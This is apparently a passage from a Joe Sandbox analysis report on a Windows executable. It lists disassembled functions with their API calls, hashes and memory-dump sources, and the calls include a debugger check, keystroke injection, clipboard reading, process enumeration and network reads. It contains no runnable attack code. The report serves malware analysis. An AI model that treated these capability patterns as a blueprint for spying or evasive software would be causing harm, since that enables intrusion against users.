                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                • String ID:
                                                • API String ID: 540024437-0
                                                • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                • API String ID: 0-2872873767
                                                • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                • __wsplitpath.LIBCMT ref: 00475644
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • _wcscat.LIBCMT ref: 00475657
                                                • __wcsicoll.LIBCMT ref: 0047567B
                                                • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                • String ID:
                                                • API String ID: 2547909840-0
                                                • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                • FindClose.KERNEL32(?), ref: 004525FF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                • String ID: *.*$\VH
                                                • API String ID: 2786137511-2657498754
                                                • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                • String ID: pqI
                                                • API String ID: 2579439406-2459173057
                                                • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                Download Yara Rule
                                                APIs
                                                • __wcsicoll.LIBCMT ref: 00433349
                                                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                • __wcsicoll.LIBCMT ref: 00433375
                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsicollmouse_event
                                                • String ID: DOWN
                                                • API String ID: 1033544147-711622031
                                                • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: KeyboardMessagePostState$InputSend
                                                • String ID:
                                                • API String ID: 3031425849-0
                                                • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorLastinet_addrsocket
                                                • String ID:
                                                • API String ID: 4170576061-0
                                                • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                • IsWindowVisible.USER32 ref: 0047A368
                                                • IsWindowEnabled.USER32 ref: 0047A378
                                                • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                • IsIconic.USER32 ref: 0047A393
                                                • IsZoomed.USER32 ref: 0047A3A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                • CoInitialize.OLE32(00000000), ref: 00478442
                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                • CoUninitialize.OLE32 ref: 0047863C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 886957087-24824748
                                                • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                • CloseClipboard.USER32 ref: 0046DD41
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                • CloseClipboard.USER32 ref: 0046DD99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                • String ID:
                                                • API String ID: 15083398-0
                                                • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: U$\
                                                • API String ID: 4104443479-100911408
                                                • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Find$File$CloseFirstNext
                                                • String ID:
                                                • API String ID: 3541575487-0
                                                • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                • FindClose.KERNEL32(00000000), ref: 004339EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirst
                                                • String ID:
                                                • API String ID: 48322524-0
                                                • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                • String ID:
                                                • API String ID: 901099227-0
                                                • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                Download Yara Rule
                                                APIs
                                                • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
